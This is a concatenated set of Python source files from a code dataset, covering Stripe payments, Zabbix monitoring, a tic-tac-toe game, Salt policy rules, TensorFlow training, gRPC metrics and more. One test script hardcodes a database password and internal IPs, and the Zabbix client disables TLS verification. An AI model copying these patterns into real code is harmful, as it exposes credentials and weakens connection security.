bt = stripe.BalanceTransaction.retrieve(bt)\n amount_settled = int_to_Money(bt.amount, bt.currency)\n fee = int_to_Money(bt.fee, bt.currency)\n net_amount = amount_settled - fee\n\n if getattr(charge, 'transfer', None):\n tr = stripe.Transfer.retrieve(charge.transfer)\n if tr.amount_reversed == 0:\n try:\n tr.reversals.create(\n amount=bt.fee,\n description=\"Stripe fee\",\n metadata={'payin_id': payin.id},\n idempotency_key='payin_fee_%i' % payin.id,\n )\n except stripe.error.StripeError as e:\n if e.code == 'idempotency_key_in_use':\n # Two threads are submitting this same request at the\n # same time, retry in a second.\n sleep(1)\n return settle_destination_charge(\n db, payin, charge, pt, intent_id=intent_id\n )\n raise\n else:\n amount_settled, fee, net_amount = None, None, payin.amount\n\n status = charge.status\n error = repr_charge_error(charge)\n\n payin = update_payin(\n db, payin.id, charge.id, status, error,\n amount_settled=amount_settled, fee=fee, intent_id=intent_id\n )\n\n pt_remote_id = getattr(charge, 'transfer', None)\n pt = update_payin_transfer(\n db, pt.id, pt_remote_id, status, error, amount=net_amount\n )\n\n return 
payin\n","sub_path":"liberapay/payin/stripe.py","file_name":"stripe.py","file_ext":"py","file_size_in_byte":14310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"104152353","text":"#!/usr/bin/env python\n#try:\n# from gi.repository import Gtk, GLib\n#except:\n# from pgi.repository import Gtk, GLib\nfrom gi.repository import Gtk, GLib\nfrom pyzabbix import ZabbixAPI\nfrom time import sleep\nimport datetime\nimport threading\n\nclass ZabbixWatch:\n def __init__(self,config):\n self.config = config\n self.zabbix = ZabbixAPI(self.config.get(\"Zabbix\",\"server\"))\n self.zabbix.session.verify = False\n self.zabbix.login(\n self.config.get(\"Zabbix\",\"user\"),\n self.config.get(\"Zabbix\",\"password\"))\n self.running = True\n self.callback = None\n self.update_intervall = int(self.config.get(\"Zabbix\",\"update_interval\"))\n try:\n self.hostgroups_rawstring = self.config.get(\"Zabbix\",\"hostgroups\")\n if len(self.hostgroups_rawstring) > 0:\n self.hostgroups_raw = [ h.strip(\" \") for h in self.hostgroups_rawstring.split(\",\") ]\n self.hostgroups = self.zabbix.hostgroup.get(\n output=\"extend\",\n filter={\"name\": self.hostgroups_raw }\n )\n else:\n self.hostgroups = self.zabbix.hostgroup.get(output=\"extend\")\n except :\n pass\n\n self.trigger_collector_thread = threading.Thread(target=self.listen)\n\n def listen(self):\n while self.running:\n try:\n # we get the problem event for the hostgroups\n events = self.zabbix.event.get(groupids=[int(h[\"groupid\"]) for h in self.hostgroups],value=1,source=0)\n # we get the triggers of these events\n triggers = self.zabbix.trigger.get(\n only_true=1,\n active=1,\n filter={\"value\":1},\n output=\"extend\",\n triggerids=[int(t[\"objectid\"]) for t in events],\n expandComment=1,\n expandDescription=1,\n expandData='host'\n )\n GLib.idle_add(lambda: self.callback(triggers))\n except:\n pass\n\n sleep(self.update_intervall)\n\n def watch(self):\n self.running = True\n self.trigger_collector_thread.start()\n\n def stop_watching(self):\n self.running = False\n\n\n\nclass ZabbixStatusIcon:\n def __init__(self,config):\n GLib.threads_init()\n self.config = config\n self.icon_problem = self.config.get(\"ZabbixTray\",\"icon_problem\")\n self.icon_ok = self.config.get(\"ZabbixTray\",\"icon_ok\")\n self.statusicon = Gtk.StatusIcon()\n self.statusicon.set_from_file(self.icon_ok)\n self.statusicon.connect(\"popup-menu\", self.right_click_event)\n\n self.zabbix = ZabbixWatch(self.config)\n self.zabbix.callback = self.update_triggers\n self.zabbix.trigger_collector_thread.start()\n\n self.triggers = []\n\n def update_triggers(self,triggers):\n self.triggers = triggers\n self.state = False\n max_prio = 0\n problem = False\n for t in triggers:\n prio = int(t[\"priority\"])\n problem_value = int(t[\"value\"])\n if prio >= max_prio:\n max_prio = prio\n if problem_value > 0:\n problem = True\n\n if problem:\n self.statusicon.set_from_file(self.icon_problem)\n else:\n self.statusicon.set_from_file(self.icon_ok)\n #if max_prio >= 2 and int(t[\"value\"]) > 0:\n # self.statusicon.set_from_file(self.icon_problem)\n #else:\n # self.statusicon.set_from_file(self.icon_ok)\n\n\n def quit(self,args):\n self.zabbix.stop_watching()\n Gtk.main_quit()\n\n def format_lastchange(self,trigger_lastchange):\n lastchange = datetime.datetime.fromtimestamp(int(trigger_lastchange))\n since = datetime.datetime.now() - lastchange\n days = since.days\n hours = since.seconds / 3600\n minutes = (since.seconds / 60 % 60)\n seconds = 
since.seconds % 60\n since_str = \"\"\n\n if days > 0:\n since_str += \"%dd \" % days\n if hours > 0:\n since_str += \"%02dh \" % hours\n since_str += \"%02dm %02ds\" % (minutes,seconds)\n return since_str\n\n\n def right_click_event(self, icon, button, time):\n self.menu = Gtk.Menu()\n problem = False\n\n for trigger in self.triggers:\n trigger_entry = Gtk.ImageMenuItem()\n trigger_lastchange = self.format_lastchange(trigger[\"lastchange\"])\n if int(trigger[\"value\"]) == 1:\n image = Gtk.Image()\n image.set_from_file(self.icon_problem)\n #t_value = '\\xe2\\x9c\\x96'.decode(\"utf-8\")\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n elif int(trigger[\"value\"]) == 0:\n image = Gtk.Image()\n image.set_from_file(self.icon_ok)\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n #t_value = '\\xe2\\x9c\\x94'.decode(\"utf-8\")\n\n\n trigger_entry.set_image(image)\n trigger_entry.set_always_show_image(True)\n\n t_value = \"\"\n trigger_entry.set_label(\"%s %s: %s [%s]\" % (\n t_value,\n trigger[\"hostname\"],\n trigger[\"description\"],\n trigger_lastchange)\n )\n self.menu.append(trigger_entry)\n\n quit = Gtk.MenuItem()\n quit.set_label(\"Quit\")\n\n quit.connect(\"activate\", self.quit)\n self.menu.append(quit)\n self.menu.show_all()\n\n #def pos(menu, icon):\n # return (Gtk.StatusIcon.position_menu(menu, icon))\n\n #self.menu.popup(None, None, pos, self.statusicon, button, time)\n self.menu.popup(None, None, None, self.statusicon, button, time)","sub_path":"lib/zabbixstatusicon.py","file_name":"zabbixstatusicon.py","file_ext":"py","file_size_in_byte":5937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146253193","text":"import os\n\nclass Board():\n \"\"\"Represents the game-board\"\"\"\n def __init__(self):\n self.board = [i for i in range(10)]\n self._win_combinations = [\n (1, 2, 3),\n (4, 5, 6),\n (7, 8, 9),\n (1, 5, 9),\n (3, 5, 7),\n (1, 4, 7),\n (2, 5, 8),\n (3, 6, 9)]\n self.game_over = False\n\n def draw_board(self):\n \"\"\"Draws the board to the terminal\"\"\"\n print(\"=========\")\n print(self.board[7], \"|\", self.board[8], \"|\", self.board[9])\n print(self.board[4], \"|\", self.board[5], \"|\", self.board[6])\n print(self.board[1], \"|\", self.board[2], \"|\", self.board[3])\n print(\"=========\")\n\n def check_if_won(self, player):\n \"\"\"Checks if the move the player just made, made him/her win the game\"\"\"\n for a, b, c in self._win_combinations:\n if self.board[a] == self.board[b] == self.board[c]:\n print(f\"Game over, player {player} won the game\")\n self.game_over = True\n\n def update(self, input, choice):\n \"\"\"Update the current board\"\"\"\n self.board[input] = choice\n os.system(\"clear\")\n self.draw_board()\n self.check_if_won(choice)\n\n def reset_board(self):\n \"\"\"Resets the board\"\"\"\n self.board = [i for i in range(10)]\n\n def tie(self):\n \"\"\"Stops the game if tie\"\"\"\n list_ = list(filter(lambda x: type(x) != int, self.board))\n return len(list_) == 9\n\n\nclass TicTacToe():\n def __init__(self):\n os.system(\"clear\")\n self.board = Board()\n self.player_1_char = \"\"\n self.player_2_char = \"\"\n self.corret_choice = False\n self.get_player_char()\n\n def reset(self):\n \"\"\"Resets the internal state to prepare for a new game\"\"\"\n self.player_1_char = \"\"\n self.player_2_char = \"\"\n self.board.reset_board()\n\n def get_player_char(self):\n \"\"\"Ask the player what character he wants to use and verify choice\"\"\"\n 
while True:\n player_1_char = input(\"Do you want to play X or O? \")\n print()\n if player_1_char == \"X\":\n self.player_1_char = \"X\"\n self.player_2_char = \"O\"\n print(\"Starting player selected X\")\n break\n elif player_1_char == \"O\":\n self.player_1_char = \"O\"\n self.player_2_char = \"X\"\n print(\"Starting player selected O\")\n break\n else:\n print(\"ERROR - input has to be either X or O!\")\n os.system(\"clear\")\n\n def get_player_input(self, player_char):\n while True:\n while True:\n x = input(f\"{player_char} Where do you want to place your piece?\")\n if x.isdigit():\n x = int(x)\n break\n else:\n print(\"Input has to be a number, try again\")\n\n if x > 0 and x < 10 and type(self.board.board[x]) != str:\n self.board.update(x, player_char)\n break\n elif x == 10:\n quit()\n else: \n print(\"Spot is taken, try again: \")\n\n def check_tie(self):\n if self.board.tie():\n self.board.game_over = True\n print(\"Game is a tie\")\n return True\n return False\n\n def run(self):\n self.board.draw_board()\n\n while not self.board.game_over:\n self.correct_player_1 = False\n self.correct_player_2 = False\n\n self.get_player_input(self.player_1_char)\n if self.board.game_over:\n break\n if self.check_tie():\n break\n\n self.get_player_input(self.player_2_char)\n if self.board.game_over:\n break\n if self.check_tie():\n break\n\n\nwhile True:\n TicTacToe().run()\n\n user_input = \"a\"\n while user_input not in \"ny\":\n user_input = input(\"Play again? (y/n)\").lower()\n\n if user_input == \"y\":\n continue\n else:\n break","sub_path":"tictactoeRefactored.py","file_name":"tictactoeRefactored.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"654128889","text":"import io\nimport json\nimport logging\nimport sys\n\nLOG = logging.getLogger(__name__)\n\nimport yaml\nimport yaml.constructor\n\ntry:\n # included in standard lib from Python 2.7\n from collections import OrderedDict\nexcept ImportError:\n # try importing the backported drop-in replacement\n # it's available on PyPI\n from ordereddict import OrderedDict\n\n# https://stackoverflow.com/questions/5121931/in-python-how-can-you-load-yaml-mappings-as-ordereddicts\nclass OrderedDictYAMLLoader(yaml.Loader):\n \"\"\"\n A YAML loader that loads mappings into ordered dictionaries.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n yaml.Loader.__init__(self, *args, **kwargs)\n\n self.add_constructor(u'tag:yaml.org,2002:map', type(self).construct_yaml_map)\n self.add_constructor(u'tag:yaml.org,2002:omap', type(self).construct_yaml_map)\n\n def construct_yaml_map(self, node):\n data = OrderedDict()\n yield data\n value = self.construct_mapping(node)\n data.update(value)\n\n def construct_mapping(self, node, deep=False):\n if isinstance(node, yaml.MappingNode):\n self.flatten_mapping(node)\n else:\n raise yaml.constructor.ConstructorError(None, None,\n 'expected a mapping node, but found %s' % node.id, node.start_mark)\n\n mapping = OrderedDict()\n for key_node, value_node in node.value:\n key = self.construct_object(key_node, deep=deep)\n try:\n hash(key)\n except TypeError as exc:\n raise yaml.constructor.ConstructorError('while constructing a mapping',\n node.start_mark, 'found unacceptable key (%s)' % exc, key_node.start_mark)\n value = self.construct_object(value_node, deep=deep)\n mapping[key] = value\n return mapping\n\n\ndef __virtual__():\n return True\n\n\ndef rule_list(path, **kwargs):\n try:\n with io.open(path, 'r') as 
file_handle:\n            rules = yaml.load(file_handle, OrderedDictYAMLLoader) or OrderedDict()\n    except Exception as e:\n        msg = \"Unable to load policy file %s: %s\" % (path, repr(e))\n        LOG.debug(msg)\n        rules = {'Error': msg}\n    return rules\n\n\ndef rule_delete(name, path, **kwargs):\n    ret = {}\n    rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n    if 'Error' not in rules:\n        if name not in rules:\n            return ret\n        del rules[name]\n        try:\n            with io.open(path, 'w') as file_handle:\n                if path.endswith('json'):\n                    serialized = json.dumps(rules, indent=4)\n                else:\n                    serialized = yaml.safe_dump(rules, indent=4)\n                if sys.version_info[0] >= 3:\n                    file_handle.write(serialized)\n                else:\n                    file_handle.write(unicode(serialized))\n        except Exception as e:\n            msg = \"Unable to save policy file: %s\" % repr(e)\n            LOG.error(msg)\n            return {'Error': msg}\n        ret = 'Rule {0} deleted'.format(name)\n    return ret\n\n\ndef rule_set(name, rule, path, **kwargs):\n    rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n    if 'Error' not in rules:\n        if name in rules and rules[name] == rule:\n            return {name: 'Rule %s already exists and is in correct state' % name}\n        rules.update({name: rule})\n        try:\n            with io.open(path, 'w') as file_handle:\n                if path.endswith('json'):\n                    serialized = json.dumps(rules, indent=4)\n                else:\n                    serialized = yaml.safe_dump(rules, indent=4)\n                if sys.version_info[0] >= 3:\n                    file_handle.write(serialized)\n                else:\n                    file_handle.write(unicode(serialized))\n        except Exception as e:\n            msg = \"Unable to save policy file %s: %s\" % (path, repr(e))\n            LOG.error(msg)\n            return {'Error': msg}\n        return rule_get(name, path, **kwargs)\n    return rules\n\n\ndef rule_get(name, path, **kwargs):\n    ret = {}\n    rules = __salt__['keystone_policy.rule_list'](path, **kwargs)\n    if 'Error' in rules:\n        ret['Error'] = rules['Error']\n    elif name in rules:\n        ret[name] = rules.get(name)\n\n    return ret\n\n","sub_path":"_modules/keystone_policy.py","file_name":"keystone_policy.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"598714698","text":"import pymysql\nimport set_adsl\nimport socket\nfrom redis import StrictRedis\n\n\ndef test_redis(host, port):\n    server = StrictRedis(host=host, port=port, decode_responses=True)\n    server.sadd('aaaaa', 'aaaaa')\n    v = server.spop('aaaaa')\n    print(v)\n\n\ndef test_mysql(host, port):\n    etl_conf = {'host': host, 'port': port, 'user': 'spider', 'password': 'chenguang', 'charset': 'utf8',\n                'db': 'spider', 'cursorclass': pymysql.cursors.DictCursor}\n    etl = pymysql.connect(**etl_conf)\n    cursor = etl.cursor()\n    sql = \"\"\"select host from information_schema.processlist WHERE ID=connection_id();\"\"\"\n    cursor.execute(sql)\n    result = cursor.fetchone()\n    print(result.get('host'))\n\n\ndef _get_host_ip():\n    \"\"\"\n    Get the IP address of the current network environment.\n    :return:\n    \"\"\"\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n    try:\n        s.connect(('8.8.8.8', 80))\n        ip = s.getsockname()[0]\n    finally:\n        s.close()\n    return ip\n
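\n# Added note (illustrative): connect() on a SOCK_DGRAM socket sends no packets;\n# it only makes the OS pick an outbound route, so getsockname() reports the\n# machine's LAN-facing address, e.g. _get_host_ip() -> '192.168.1.23'.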
\n\nif __name__ == '__main__':\n    set_adsl.set_interface('10.146.254.57')\n    r = {'host': '10.142.97.80', 'port': 50111}\n    # m = {'host': '10.146.252.112', 'port': 50112}\n    test_redis(**r)\n    # test_mysql(**m)\n","sub_path":"Diglossia/scrapyProject/others/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"555082056","text":"from flask import (Blueprint, render_template, abort, request, redirect)\nfrom jinja2 import TemplateNotFound\nfrom subscribie.auth import login_required\n\nmodule_iframe_embed = Blueprint('iframe_embed', __name__, template_folder='templates')\n\n@module_iframe_embed.route('/iframe_embed/index') # Define a module index page\n@module_iframe_embed.route('/show-iframe-embed')\n@login_required\ndef get_iframe_embed():\n    \"\"\"Show the iframe snippet for embedding this site elsewhere.\"\"\"\n    # The original iframe markup appears to have been stripped from this file;\n    # a minimal embed pointing at the site root is assumed as a placeholder.\n    iframe = '''\n    <iframe src=\"{}\"></iframe>\n    '''.format(request.host_url)\n    try:\n        return render_template('show-iframe-embed.html', iframe=iframe)\n    except TemplateNotFound:\n        abort(404)\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"183450055","text":"#!/usr/bin/env python\n\n# Get annual and diurnal cycle position from \n# wind, temperature, and prmsl.\n\nimport os\nimport sys\nimport tensorflow as tf\n#tf.enable_eager_execution()\nfrom tensorflow.data import Dataset\nimport pickle\nimport numpy\nfrom glob import glob\n\n# How many epochs to train for\nn_epochs=25\n\n# Target data setup\nbuffer_size=100\nbatch_size=1\n\n# Training datasets with four variables\ninput_file_dir=((\"%s/Machine-Learning-experiments/datasets/uk_centred/\" +\n                \"20CR2c/air.2m/training/\") %\n                   os.getenv('SCRATCH'))\nt2m_files=glob(\"%s/*.tfd\" % input_file_dir)\nn_steps=len(t2m_files)\ntr_tfd = tf.constant(t2m_files)\n\n# Create TensorFlow Dataset object from the file names\ntr_data = Dataset.from_tensor_slices(tr_tfd).repeat(n_epochs)\n\n# From the t2m file name, make a four-variable tensor\ndef load_tensor(file_name):\n    sict = tf.read_file(file_name)\n    t2m = tf.parse_tensor(sict,numpy.float32)\n    t2m = tf.reshape(t2m,[79,159,1])\n    file_name = tf.strings.regex_replace(file_name,\n                                         'air.2m','prmsl')\n    sict = tf.read_file(file_name)\n    prmsl = tf.parse_tensor(sict,numpy.float32)\n    prmsl = tf.reshape(prmsl,[79,159,1])\n    file_name = tf.strings.regex_replace(file_name,\n                                         'prmsl','uwnd.10m')\n    sict = tf.read_file(file_name)\n    uwnd = tf.parse_tensor(sict,numpy.float32)\n    uwnd = tf.reshape(uwnd,[79,159,1])\n    file_name = tf.strings.regex_replace(file_name,\n                                         'uwnd.10m','vwnd.10m')\n    sict = tf.read_file(file_name)\n    vwnd = tf.parse_tensor(sict,numpy.float32)\n    vwnd = tf.reshape(vwnd,[79,159,1])\n    ict = tf.concat([t2m,prmsl,uwnd,vwnd],2) # Now [79,159,4]\n    ict = tf.reshape(ict,[79,159,4])\n    return ict\n\n# From the t2m file name, calculate the cycle locations\nmday=tf.constant([0,31,59,90,120,151,181,212,243,273,304,334])\ndef cycle_tensor(file_name):\n    fdte = tf.strings.substr(file_name,-17,17)\n    year = tf.strings.substr(fdte,0,5)\n    mnth = tf.strings.substr(fdte,5,2)\n    day = tf.strings.substr(fdte,8,2)\n    day = tf.cond(tf.math.equal(mnth+day,'0229'),\n                  lambda: tf.constant('28'),lambda: day)\n    hour = tf.strings.substr(fdte,11,2)\n    diurnal = tf.strings.to_number(hour)/24.0\n    mnth_i = tf.strings.to_number(mnth,tf.dtypes.int32)-1\n    annual = (tf.cast(tf.gather(mday,mnth_i),tf.dtypes.float32)+\n              tf.strings.to_number(day))*3.141592/365.0\n    annual = tf.math.sin(annual)\n    cycles = tf.stack([annual,diurnal], 0)\n    return cycles\n\ntr_source = tr_data.map(load_tensor)\ntr_target = tr_data.map(cycle_tensor)\ntr_data = Dataset.zip((tr_source, tr_target))\ntr_data = tr_data.shuffle(buffer_size).batch(batch_size)\n
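\n# Added note (illustrative): for a notional file stamped 1969-03-01:12 the\n# targets would be annual = sin((59+1)*3.141592/365) ~= 0.49 and diurnal = 12/24 = 0.5.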
\n\n# Same for the test dataset\ninput_file_dir=((\"%s/Machine-Learning-experiments/datasets/uk_centred/\" +\n                \"20CR2c/air.2m/test/\") %\n                   os.getenv('SCRATCH'))\nt2m_files=glob(\"%s/*.tfd\" % input_file_dir)\ntest_steps=len(t2m_files)\ntest_tfd = tf.constant(t2m_files)\ntest_data = Dataset.from_tensor_slices(test_tfd).repeat(n_epochs)\ntest_source = test_data.map(load_tensor)\ntest_target = test_data.map(cycle_tensor)\ntest_data = Dataset.zip((test_source, test_target))\ntest_data = test_data.batch(batch_size)\n\n# Input placeholder\noriginal = tf.keras.layers.Input(shape=(79,159,4,), name='encoder_input')\n# Encoding layers\nx = tf.keras.layers.Conv2D(4, (3, 3), padding='same')(original)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(12, (3, 3), strides=(2, 2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(36, (3, 3), strides=(2, 2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Conv2D(108, (3, 3), strides=(2, 2), padding='valid')(x)\nx = tf.keras.layers.ELU()(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Reshape(target_shape=(9*19*108,))(x)\nx = tf.keras.layers.Dropout(0.3)(x)\nx = tf.keras.layers.Dense(100)(x)\nx = tf.keras.layers.ELU()(x)\nencoded = tf.keras.layers.Dense(2)(x)\n\nencoder = tf.keras.models.Model(inputs=original,\n                                outputs=encoded,\n                                name='encoder')\n\nencoder.compile(optimizer='adadelta',loss='mean_squared_error')\n
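\n# Added shape check (illustrative): each sample enters as (79,159,4); the three\n# stride-2 'valid' convolutions reduce the grid 79x159 -> 39x79 -> 19x39 -> 9x19\n# with 108 channels, matching the 9*19*108 Reshape above.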
\n\n# Save model and history state after every epoch\nhistory={}\nhistory['loss']=[]\nhistory['val_loss']=[]\nclass CustomSaver(tf.keras.callbacks.Callback):\n    def on_epoch_end(self, epoch, logs={}):\n        save_dir=(\"%s/Machine-Learning-experiments/\"+\n                  \"convolutional_autoencoder_perturbations/\"+\n                  \"check_cycles/saved_models/Epoch_%04d\") % (\n                      os.getenv('SCRATCH'),epoch)\n        if not os.path.isdir(os.path.dirname(save_dir)):\n            os.makedirs(os.path.dirname(save_dir))\n        for model in ['encoder']:\n            if not os.path.isdir(os.path.dirname(\"%s/%s\" % (save_dir,model))):\n                os.makedirs(os.path.dirname(\"%s/%s\" % (save_dir,model)))\n        tf.keras.models.save_model(encoder,\"%s/encoder\" % save_dir)\n        history['loss'].append(logs['loss'])\n        history['val_loss'].append(logs['val_loss'])\n        history_file=(\"%s/Machine-Learning-experiments/\"+\n                      \"convolutional_autoencoder_perturbations/\"+\n                      \"check_cycles/saved_models/history_to_%04d.pkl\") % (\n                          os.getenv('SCRATCH'),epoch)\n        pickle.dump(history, open(history_file, \"wb\"))\n\nsaver = CustomSaver()\n\n# Train the encoder (use a separate name so the history dict above is kept)\nfit_history=encoder.fit(x=tr_data,\n                        epochs=n_epochs,\n                        steps_per_epoch=n_steps,\n                        validation_data=test_data,\n                        validation_steps=test_steps,\n                        verbose=1,\n                        callbacks=[saver])\n\n","sub_path":"experiments/convolutional_autoencoder_perturbations/uk_centred_4var/check_cycles/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":5876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"573974947","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom openerp.osv import osv, fields\n\nclass res_partner(osv.osv):\n    _inherit = \"res.partner\"\n\n    _columns = {\n        'mol': fields.char('MOL', help=\"Materially responsible person (MOL)\"),\n        'bulstat': fields.char('Bulstat', help='Bulstat (Bulgarian company registry number)'),\n        'egn': fields.integer('EGN', help=\"Unified civil number (EGN)\")\n    }\n","sub_path":"openerp/addons/roki/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"111998105","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('core', '0019_auto_20140713_1820'),\n    ]\n\n    operations = [\n        migrations.AddField(\n            model_name='tour',\n            name='scheme_method',\n            field=models.CharField(default='weekly', max_length=256, choices=[('weekly', 'Rullande veckoschema'), ('irregular', 'Oregelbundet')]),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"rida/core/migrations/0020_tour_scheme_method.py","file_name":"0020_tour_scheme_method.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"357617851","text":"import time\nfrom datetime import datetime\nfrom lamp import Lamp\n\n# TURN_ON_FADE_IN = { 'hour': 13, 'minute': 00 }\n# TURN_ON_FULL = { 'hour': 15, 'minute': 00 }\n# TURN_ON_FADE_OUT = { 'hour': 22, 'minute': 00 }\n# TURN_OFF = { 'hour': 23, 'minute': 59 }\nTURN_ON_FADE_IN = { 'hour': 14, 'minute': 0 }\nTURN_ON_FULL = { 'hour': 15, 'minute': 30 }\nTURN_ON_FADE_OUT = { 'hour': 22, 'minute': 0 }\nTURN_OFF = { 'hour': 23, 'minute': 30 }\n\nlamp = Lamp()\n\ndef start_job():\n    hour = 13\n    minute = 50\n    while True:\n        now = datetime.now()\n\n        # hour = int(now.strftime('%H'))\n        # minute = int(now.strftime('%M'))\n        print(hour, \":\", minute)\n\n        if should_turn_fade_in(hour, minute):\n            intensity = 100 - int(time_diff({'hour': hour, 'minute': minute}, TURN_ON_FULL) * 100 / LENGTH_FADE_IN)\n            print(\"brightening: \", intensity)\n            lamp.turn_blue_to(intensity)\n            lamp.turn_white_to(intensity)\n            lamp.turn_red_to(intensity)\n\n        elif should_turn_full_on(hour, minute):\n            print(\"full on\")\n            lamp.turn_blue_to(100)\n            lamp.turn_white_to(100)\n            lamp.turn_red_to(100)\n\n        elif should_turn_fade_out(hour, minute):\n            intensity = int(time_diff({'hour': hour, 'minute': minute}, TURN_OFF) * 100 / LENGTH_FADE_OUT)\n            print(\"dimming: \", intensity)\n            lamp.turn_blue_to(intensity)\n            lamp.turn_white_to(intensity)\n            lamp.turn_red_to(intensity)\n\n        else:\n            print(\"off\")\n            lamp.turn_blue_to(0)\n            lamp.turn_white_to(0)\n            lamp.turn_red_to(0)\n\n        time.sleep(0.1)\n\n        minute += 1\n        if minute == 60:\n            minute = 0\n            hour += 1\n            if hour == 24:\n                hour = 0\n\ndef should_turn_fade_in(current_hour, current_minute):\n    return current_hour * 60 + current_minute >= TURN_ON_FADE_IN['hour'] * 60 + TURN_ON_FADE_IN['minute'] and \\\n           current_hour * 60 + current_minute <= TURN_ON_FULL['hour'] * 60 + TURN_ON_FULL['minute']\n
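\n# Added sanity check (illustrative): 14:45 is 885 minutes into the day, inside\n# the fade-in window [840, 930]; 16:00 (960 minutes) is past it.\nassert should_turn_fade_in(14, 45) and not should_turn_fade_in(16, 0)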
\ndef should_turn_full_on(current_hour, current_minute):\n    return current_hour * 60 + current_minute >= TURN_ON_FULL['hour'] * 60 + TURN_ON_FULL['minute'] and \\\n           current_hour * 60 + current_minute <= TURN_ON_FADE_OUT['hour'] * 60 + TURN_ON_FADE_OUT['minute']\n\ndef should_turn_fade_out(current_hour, current_minute):\n    return current_hour * 60 + current_minute >= TURN_ON_FADE_OUT['hour'] * 60 + TURN_ON_FADE_OUT['minute'] and \\\n           current_hour * 60 + current_minute <= TURN_OFF['hour'] * 60 + TURN_OFF['minute']\n\ndef time_diff(start, end):\n    if start['hour'] > end['hour'] or start['hour'] == end['hour'] and start['minute'] > end['minute']:\n        return (datetime(2020, 1, 2, end['hour'], end['minute'], 0) - \\\n                datetime(2020, 1, 1, start['hour'], start['minute'], 0)) \\\n                .total_seconds()\n    else: \n        return (datetime(2020, 1, 1, end['hour'], end['minute'], 0) - \\\n                datetime(2020, 1, 1, start['hour'], start['minute'], 0)) \\\n                .total_seconds() \n\n    \nLENGTH_FADE_IN = time_diff(TURN_ON_FADE_IN, TURN_ON_FULL)\nLENGTH_FADE_OUT = time_diff(TURN_ON_FADE_OUT, TURN_OFF)\n\n# print(time_diff(TURN_ON_FADE_IN, TURN_ON_FULL))\n# print(time_diff(TURN_ON_FULL, TURN_ON_FADE_OUT))\n# print(time_diff(TURN_ON_FADE_OUT, TURN_OFF))\n# print(time_diff(TURN_OFF, TURN_ON_FADE_IN))\n# print ('turned off')\nstart_job()\n","sub_path":"src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"491884365","text":"import grpc\nimport time\n\nfrom timeit import default_timer\n\nfrom .server_metrics import SERVER_HANDLED_LATENCY_SECONDS\nfrom .server_metrics import SERVER_HANDLED_COUNTER\nfrom .server_metrics import SERVER_STARTED_COUNTER\n\nfrom .util import type_from_method\nfrom .util import code_to_string\n\n\ndef _wrap_rpc_behavior(handler, fn):\n    if handler is None:\n        return None\n\n    if handler.request_streaming and handler.response_streaming:\n        behavior_fn = handler.stream_stream\n        handler_factory = grpc.stream_stream_rpc_method_handler\n    elif handler.request_streaming and not handler.response_streaming:\n        behavior_fn = handler.stream_unary\n        handler_factory = grpc.stream_unary_rpc_method_handler\n    elif not handler.request_streaming and handler.response_streaming:\n        behavior_fn = handler.unary_stream\n        handler_factory = grpc.unary_stream_rpc_method_handler\n    else:\n        behavior_fn = handler.unary_unary\n        handler_factory = grpc.unary_unary_rpc_method_handler\n\n    return handler_factory(fn(behavior_fn,\n                              handler.request_streaming,\n                              handler.response_streaming),\n                           request_deserializer=handler.request_deserializer,\n                           response_serializer=handler.response_serializer)\n\n\nclass PromServerInterceptor(grpc.ServerInterceptor):\n\n    def intercept_service(self, continuation, handler_call_details):\n\n        handler = continuation(handler_call_details)\n\n        # only support unary\n        if handler.request_streaming or handler.response_streaming:\n            return handler\n\n        client_call_method = handler_call_details.method\n        ss = client_call_method.split(\"/\")\n        if len(ss) < 3:\n            return handler\n        grpc_service = ss[1]\n        grpc_method = ss[2]\n        grpc_type = type_from_method(handler.request_streaming, handler.response_streaming)\n\n        SERVER_STARTED_COUNTER.labels(\n            grpc_type=grpc_type,\n            grpc_service=grpc_service,\n            grpc_method=grpc_method).inc()\n
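\n        # Added note (illustrative): a call to '/helloworld.Greeter/SayHello' is\n        # labelled grpc_service='helloworld.Greeter', grpc_method='SayHello',\n        # grpc_type='UNARY'.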
